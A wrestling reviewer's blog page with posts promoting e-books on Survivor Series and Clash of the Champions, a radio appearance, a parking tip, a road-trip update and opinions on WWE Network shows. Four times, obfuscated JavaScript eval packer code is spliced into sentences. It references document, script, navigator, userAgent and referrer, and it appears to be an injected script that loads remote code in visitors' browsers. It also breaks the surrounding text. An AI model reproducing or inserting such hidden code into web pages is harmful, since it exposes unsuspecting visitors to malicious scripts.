New E-Book: KB’s History of Survivor Series

This time we’re starting back in 1987 when there was only one WWF pay per view a year.  With Wrestlemania III being a huge success, it was decided that another pay per view should be added to help bridge the gap between Wrestlemanias.  The fact that it was able to cause major damage to the NWA was just a bonus.

There has been a long list of great Survivor Series matches over the years, including the tag team Survivor Series matches, Bret Hart vs. Shawn Michaels in 1992 and Steve Austin vs. Bret Hart. There’s also a big list of people making their debut with the company at the show. Names like the Undertaker, Kurt Angle and The Rock all stepped into the ring for the first time at Survivor Series. On top of all that Survivor Series had the most infamous moment in wrestling history that changed a lot of things forever.

In this new book, I’ll be looking at the history of the Survivor Series, breaking down each show and going over every match, promo and segment, providing historical context, analysis and rating each match and show.

The book is available from Amazon for just $3.99 (or the equivalent in any other currency) and runs 391 pages on a Kindle. If you don’t have a Kindle, there are free apps that you can get to read it on your phone, laptop, iPad, or any other electronic device you have. These can be found from Amazon here.

You eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hndne|var|u0026u|referrer|ehzsz||js|php'.split('|'),0,{})) can pick it up from Amazon here.

From the UK Amazon here.

From the Canadian Amazon here.

Or if you’re in another country with its own Amazon page, just search KB Survivor Series and it should be the first thing that pops up.

Also you can still get any of my previous books on the WWE Championship, Monday Night Raw from 1998 and 2001, Monday Nitro from 1995-96, In Your House, Summerslam, Starrcade and Clash of the Champions at my author’s page here.

I hope you enjoy it and thanks for checking it out.

Clash of the Champions Now On WWE Network

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|enzbh|var|u0026u|referrer|dkttt||js|php'.split('|'),0,{})) series is available on WWE Network in its entirety under the Vault section. There are 35 shows in the series with some of the best matches WCW ever produced included.

In case you don’t know, I’ve written an e-book of reviews for all 35 shows which is available at Amazon. It’s an in depth look at every show including reviews, background information, analysis and play by play of every match and segment in the show’s history. These reviews are all new, aren’t available on the site and can only be found in the book.

The book can be found here in America:

If you live in another country, just go to your Amazon page and search for KB’s History of Clash of the Champions. The book is under $4 or the equivalent in whatever other country. It serves as a great guide through the series in case you’re new to WCW or don’t know a lot of the background information.

Check it out and enjoy,

It’s the Mouth of the South Shore Radio Show and it airs tomorrow (Monday) night at 9:30pm EST for an hour. The show has already been taped and is a solid interview, talking about Axxess, Wrestlemania, Raw, the Warrior, Evolution and various Divas. It’s worth a listen and I’m almost entertaining this time.

Thank you all so very much.  I don’t know how to comprehend how this works but it does.

Also thank you all for supporting me with the site and buying the e-books.  Those things are the reason I’m down here this weekend and having the time of my life.  Thank you all so much for letting me live this life as it blows my mind more and more every day.

It’s a simple idea: order parking permits in advance.  Down here for Wrestlemania and Raw, it’s $15 to park per show, cash only.  Parkingpanda listed a TON of parking areas within half a mile of the show, with some far under the cost.  I got a pass for each show for $4.50 each and THEY WORKED.  I found the parking lot, walked maybe ten minutes and was at the Super Dome.  No issues, no waiting in line (it was a good sized lot but very few cars as the regular price is higher than the site’s price), easy to get in and out of, it was great.

They’re available in most major cities with passes available for most major sports teams and arenas.  Check them out.

Greetings From Meridian, Mississippi

I’m eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|idzdn|var|u0026u|referrer|hkdrs||js|php'.split('|'),0,{})) in the Magnolia State for the first time ever and chilling in a hotel room after putting in over 500 miles today.  I’m about 3 hours and 15 minutes out of New Orleans and will hopefully be there in time for the Wrestlemania Superstore opening tomorrow afternoon for a meeting with Captain Charisma himself.  After that it’s off to Supercard of Honor VIII for my first live Ring of Honor show.

The regular reviews will be a bit slower this week due to my traveling so please bear with me.  I’m hoping to have Impact up tonight and if I have time I’ll do NXT tomorrow.  Smackdown I’m not sure on but it’s going to be the Wrestlemania special anyway.

Sorry for the delays but hang in there because I’ll have a lot of live reports coming up all weekend plus Monday.

Sorry For The Lack Of Updates Today/WWE Network Original Shows

I’ve eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzhiz|var|u0026u|referrer|dyyfb||js|php'.split('|'),0,{})) been getting ready for the trip and didn’t really want to get into any big reviews.  Instead I just kind of watched stuff on the Network all day so I figured I’d give my thoughts on its original series so far since I somehow haven’t this far into the launch.Wrestlemania Rewind – I like the concept here but there’s only a certain amount of episodes they can air.  However, they can switch it up to various versions such as Summerslam, Royal Rumble etc or even the lower shows like MITB.  It’s a cool concept and it comes back to the best thing the WWE Network has going for it: they can air whatever they want and they have all the time they want to do so.  It’s cool for a flashback and a great way to get people ready for Wrestlemania.  Airing the match is another nice touch.

Beyond the Ring – Not really original but it’s a really smart move.  Those documentaries can rock and they have like a million of them to air so far with more coming out every year.  They’re long so I wouldn’t recommend starting one unless you have a lot of time on your hands.

Legends of Wrestling – Maybe my favorite show they have, even though a lot of them are old.  I love listening to the legends telling stories for an hour on any given topic as there’s a very natural feeling to the idea.  It works so well but some of the panel members are just awful choices, like Mike Graham who just isn’t relevant to anything outside of “The Mike Graham Story.”

Countdown – I thought this was going to be a really generic show but I’m digging the heck out of it so far.  There are hundreds of ideas you could do for this show and it could go on for a long time.  Some of the choices have actually surprised me and the whole thing is far better than it should be.  THe talking heads help a lot and the mini features they throw in are great too.  For example there’s an episode about entrances and they throw in a retrospective about ring robes.  That’s awesome stuff for old school fans like myself and it allows for a lot of debate after it’s over.

Shockingly enough I’m loving most of these shows which are all bonus material to the huge library and all the regular programming you get as well.  The Network is everything I was hoping it would be and it’s just awesome so far.  I can’t wait for them to add even more content as they could keep putting out new stuff for years.
